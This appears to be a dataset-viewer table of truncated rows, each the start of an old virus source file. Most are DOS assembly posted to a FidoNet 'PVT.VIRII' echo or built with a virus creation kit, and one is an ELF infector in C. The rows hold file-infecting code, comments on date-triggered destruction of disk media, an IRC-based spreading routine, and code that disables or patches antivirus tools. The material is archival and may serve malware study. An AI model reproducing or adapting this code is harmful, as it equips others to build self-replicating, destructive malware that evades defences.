text stringlengths 0 20k |
|---|
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 21 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_198.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 30 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MINDLESS.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 35 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : NINA.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: p... |
;*****************************************************************************
;
; Violator - Strain B
;
;*****************************************************************************
;
; (Aug/09/90)
;
; Development Notes:
;
; I encountered several errors in the original Violator cod... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 11 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : SWEDISH.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; COCROACH.ASM -- CockRoach Virus 1.0
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Anonymous Caller
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're ... |
.model tiny
VStart equ BegVir
VEnd equ LastByte
Len equ VEnd-VStart
LenPar equ (Len/10h)+1
.code
org 100h
Start: jmp BegVir
nop
nop
nop
mov dx,offset Stri
mov ah,9
int 21h
mov ax,4c00h
int 21h
Stri db 'This is Mutant-59 shtamp.',13,10,36
BegVir: call $+3
Go: pop bp ;VirusEntry+3
mov si,bp
sub bp,3
Add si,... |
PVT.VIRII (2:465/65.4) PVT.VIRII
Msg : 18 of 54
From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
To : - *.* - Fri 11 Nov 94 08:10
Subj : DOS1.ASM ... |
.286
.model tiny
.code
org 100H
start: ror si,1
lodsb
add si,ax
mov [si],ah
mov dx,82H
mov ax,3D00H
int 21H
jc rt
mov cx,40*200
xchg bx,ax
push 0A000H
pop ds
mov al,13
int 10H
mov si,10H
m10: mov dx,03C4H
mov al,2
out dx,al
xchg si,ax
shr al,1
inc dx
out dx,al
xchg si,ax
mov ah,3FH
cwd
int 21H
... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 3 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : LCT_762.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int:... |
; HEEVAHAV.ASM -- HEEVAHAVA VIRUS
; Created with Nowhere Man's Virus Creation Laboratory v1.00/TASM
; Written by URNST KOUCH
; This is a spawning virus I decided to take to the limit,
; to step on the accelerator of the VCL, so to speak.
; HEEVAHAVA virus is a 'companion' .EXE infector which will attempt
; to infect al... |
DATA_1E EQU 4
DATA_2E EQU 6
DATA_3E EQU 0CH
DATA_4E EQU 0EH
DATA_5E EQU 2CH
DATA_6E EQU 2CH
DATA_7E EQU 0F7H
DATA_8E EQU 0FBH
DATA_11E EQU 901H
DATA_12E EQU 1002H
DATA_13E EQU 1802H
DATA_14E EQU 1F01H
DATA_15E EQU 3918H
DATA_16E EQU 57C6H
DATA_17E EQU 0F046H
DATA_18E EQU 0FFDCH
DATA_19E EQU 0FFDEH
CODE_SEG ... |
;*****************************************************************************
;
; Violator - Strain B2
;
;*****************************************************************************
;
; (Sep/23/90)
;
; Development Notes:
;
; In this version, I have implemented various methods of thwarting users
; at... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 27 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : RUSHHOUR.DSM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648.
; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem.
; Komentarze te poprzedzane s znakami AK:.
; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990.
comment ;
***************************************************... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 34 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HYDRA_8.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
;
; Violator Strain C - "Violator strikes again..."
;
; Written by The High Evolutionary
; RABID International Development Corp.
;
;
; Here are the equates for when the virus will destroy media
;
month equ 6 ;Set month to June
day equ 22 ;Set day to the 22nd
year equ 1991 ;Set year to 1991
sectors equ 256 ;F... |
;VSLAY - simple de-install Microsoft Antivirus VSAFE
;demonstration code for Crypt Newsletter 16
code segment
assume cs:code, ds:code, es:code, ss:nothing
org 100h
begin: call vslay
vslay:
mov ax,64001 ;wakes up VSAFE to keyboard input
mov dx,... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 1 of 63
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:08
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MICRO29.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int:... |
;
; VIPERizer, Strain B
; Copyright (c) 1992, Stingray/VIPER
; This is a Viral Inclined Programming Experts Ring Programming Team Production
;
; VIPER are: Stingray, Venom, and Guido Sanchez
;
MOV_CX MACRO X ; Here is just a simple "mov cx,xxxx" macro.
DB 0B9H
DW X
ENDM
CODE ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 28 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MINDLESS.DSM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 2 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
;To : - *.* - Fri 11 Nov 94 08:10
; Subj : BLJEC_8A.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int:... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 26 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CIVIL411.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
PAGE 59,132
;
;
; V651
;
; Created: 17-Jan-80
; Version:... |
;******************************************************************************
; Violator Strain A Source Code
;******************************************************************************
;
; (May/1/1991)
;
; Well, in memory of the first anniversary of writing Violator, I have decided
; to release it's source ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 29 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HIDOS.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 8 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HYDRA_2.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int:... |
; NOMEM.ASM -- NoMem
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Frankenchrist
virus_type equ 2 ; Spawning Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code ... |
; JOHN.ASM -- For John Boy!
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Pentagrame
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
cod... |
.model tiny
.code
org 100h
kkk:
nop ; ID
nop ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov... |
; CODEZERO.ASM -- Code Zero Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
co... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 43 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : V_648.DIS
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
name Virus
title Virus; based on the famous VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
newjmp equ 7Bh ;Code of jmp instruction
codeptr equ 7A ;Here is formed a jump to virus code
pname equ 78 ;Offset of file name in dir path
poffs equ 76 ;Address of 'PATH' string
err... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 10 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : VCLMIKES.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 14 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_159.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 22 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : STACKVIR.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 45 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TREKWAR.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
;*****************************************************************************
;
; Violator - Strain B2
;
;*****************************************************************************
;
; (Sep/23/90)
;
; Development Notes:
;
; In this version, I have implemented various methods of thwarting users
; at... |
.model tiny
.code
org 100h
kkk:
nop ; ID
nop ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov... |
page ,132
name V847
title The V-847 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
timer equ 6C
olddta equ 80
virlen equ offset endcode - offset start
smalcod equ offset endcode - offset transf
buffer equ offset endcode + 100
newdta equ offset endcode + 10
fname = newdta + 1E
virlenx = offset endcod... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 17 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : DOS_1.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
; Vanquishing by Arsonic
; Type: Direct Action Appending COM infector
;
; Notes: Attempts to Spread VIA Irc Clients by modifying the Script.ini
; to send a file called SEX.COM to everyone who joins a Channel the infected
; person is currently on.
;
; Attempts to patch the avp antivirus.
;
;
; Detection Stats:
; ... |
page ,132
name VHP_353
title Virus; based on the famous VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
newjmp equ 7Bh ;Code of jmp instruction
codeptr equ 7A ;Here is formed a jump to the virus code
pname equ 78 ;Offset of file name in the dir path
poffs equ 76 ;Offset ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 1 of 55
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : OW_40.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: p... |
; VMESSIAH.ASM -- Viral Messiah Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not T... |
;*****************************************************************************
; Violator Strain B3
;*****************************************************************************
;
; Notes: (Oct.24.9O)
; ------------------
;
; (TJA) Bah! Sorry I released this late. Wanted to make sure all of the bugs
; ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 53 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : KOD4_399.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 36 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : FLAGYLL.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; 室 ⮣ p (PROBLEM) p㦥 㯫
; 設 . p⭮ p p ⥬.
; 筮⥩ , p⠥ .
; p 宦 ⥪
; ᥡ . o p .
; p ᬮp.
; ᨫ.
PAGE 64,132
;--------------------------------------------------------------------------
MOD_SIZE EQU (MOD_TOP-START+0Fh)/10h
ARE_SIZE EQU (ARE_TOP-START+0Fh)/10h
STK_SIZE EQU ... |
name Virus
title Virus; based on the famous VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
start:
jmp virus
int 20
data label byte ;Data section
dtaaddr dd ? ;Disk Transfer Address
ftime dw ? ;File date
fdate dw ? ;File time
fattrib dw ? ;File attribute
saveins db 3 dup... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 23 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HYDRA_0.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
start:
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
virus:
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify... |
name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
start:
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
virus:
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 20 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : GUPPY.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 1 of 64
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ViRii
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC... |
;*****************************************************************************
;
; Violator - Strain B
;
;*****************************************************************************
;
; (Aug/09/90)
;
; Development Notes:
;
; I encountered several errors in the original Violator code which I
; correc... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 6 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : KOD4_129.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; VMESSIAH.ASM -- Viral Messiah Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not T... |
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 49 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : NUMBER_6.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 41 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment byte public
assume cs:code,ds:code,es:code
org 100h
environ equ 2C
start:
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
virus:
push cx ;Save CX
mov dx,offset data ;Restore original fir... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 44 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : 405_B.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
... |
.8086
page ,132
cseg segment
assume cs:cseg,ds:cseg,es:cseg
org 100h
start:
db 0E9h
dw 15h
id dw 0FFFFh
org 110h
virus:
push ds
mov ax,cs
db 00000101b
new_ds dw 0FFFFh
mow ds,ax
restore_3_bytes:
mow al,bytes_3[0]
mow byte ptr cs:[100h],al
mow al,bytes_3[1]
mow byte ptr cs:[101h],al
mov al,bytes... |
; UNTITLED.ASM
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code ... |
name a
code1 segment byte
assume cs:code1,ds:code1
org 0004h
D4 = $
org 0050h
N50 = $
org 0100h
BegAddr = $
Begin:
mov si,04h
mov ds,si
lds dx,dword ptr [si+08h] ; get addr of int 13h into ds:dx
... |
page ,132
name V800
title The 'Live after Death' virus
.radix 16
; ͻ
; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", ap. 51
; Telephone: Private: (+35-92) 58-62-61, Office: (+35-92) 71-401 ext. 255
;
; The 'Live after Death' Virus
; Disassem... |
jmp short loc_3
nop
dec cx
inc dx
dec bp
and [bx+si],ah
xor bp,data_10
add al,[si]
data_14 dw 1
add al,[bx+si]
add bh,[bp+di]
mov data_12,al
add [bx+di],dl
add [si],al
add [bx+di],dl
add [bp+di],dh
loc_3:
xor ax,ax
mov ss,ax
mov sp,7C00h
mov ds,ax
mov ax,data_5
sub ax,2
mov ... |
; GOOBER2.ASM -- GOOBER 2
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by URNST KOUCH
virus_type equ 0 ; Appending Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 37 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : LTBRO299.DSM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
PAGE 59,132
;
;
; VORONEZH
;
; Created: 2-Mar-91
; Passes: 5 Analysis Options on: AJW
;
;
data_1e equ 1C2h
data_5e equ 3
data_6e equ 0
data_7e equ 2
data_46e equ 100h
seg_a segment byte publ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 1 of 56
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HACKTIC2.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 25 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLONWAR2.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 52 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : DEMOEXE.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 1 of 61
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:09
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : WWT_02.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
; disassembly of vienna-b1 virus
jmp label1
message:
db "ello, world!$" ;*************
mov ah,09h ;print string ; part of *
mov dx,message ;point to string ; original *
int 21h ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 46 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : AP_440.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int:... |
;*****************************************************************************
;
; Violator - Strain B
;
;*****************************************************************************
;
; (Aug/09/90)
;
; Development Notes:
;
; I encountered several errors in the original Violator code which I
; correc... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 39 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CRF.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: p ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 5 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : VCL_RICH.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; Virus in Assembly Language
; --------------------------
;Most viruses out there have been written in assembly because assembly has the
;unique ability to bypass operating system security.
;Here is an example of a virus written under MS-DOS 2.1 and can obviously be
;compi... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 13 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_158.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
start:
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
virus:
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify... |
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 51 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : BUTTRFLY.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 9 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLONEWAR.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
/* --- Cut - Begin MAIN.C --- */
/* This is VLP I . Another method to infect ELF-execs.
* Copyright (C) 1997 by Stealthf0rk of S V A T
* This Virii contains *no* malicious code, but due to
* bugs it is possible that you may get some damage on your system.
* You use this progrma(s) on your own risk ! ! !
* I'm no... |
;------------------------------------------------------------------------------
;- V 500 ver 2.1 <03:04:91> GeMiCha *.COM -
;------------------------------------------------------------------------------
page ,132
name V500
title The V-500 virus
.radix 16
code segment
ass... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 15 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_167.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
;******************************************************************************
; Violator Strain A Source Code
;******************************************************************************
;
; (May/1/1991)
;
; Well, in memory of the first anniversary of writing Violator, I have decided
; to release it's source ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 12 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_156.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (In... |
start segment
assume cs:start,ds:start
org 100h
boot equ 0f00h
kezd: db 52h,24h
jmp hideg
nop
jmp meleg
nop
jmp tamad
veg1: dw 0
kezd1: dw 0
meleg: pop si
pop ds
pop [si]
pop [si+2]
mov si,boot
mov di,7c00h
push cs
pop ds
xor ax,ax
mov es,ax
mov cx,100h
pushf
cld
rep movsw
popf
ok1: db 0eah,00,7ch... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 24 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CREEPER.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: jmp l_02F3 ;0100 E9 01F0
db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E
org 2F3h
;----------------------------------------------
l_02F3: push cx ;02F3 51
mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683
nop ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 33 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MICHANGL.A1
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int... |
; JOHN.ASM -- For John Boy!
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Pentagrame
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
cod... |
page ,132
name V345
title V-345 - a mutation of the V-845 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
timer equ 6C
olddta equ 80
virlen = offset endcode - offset start
newid = offset ident - offset start
start:
jmp short virus
ident dw 'VI'
counter db 0
allcom db '*.COM',0
progbeg dd ?
eof dw ... |
; PVT.VIRII (2:465/65.4) PVT.VIRII
; Msg : 40 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLUST.ASM
;
;.RealName: Max Ivanov
;
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ... |
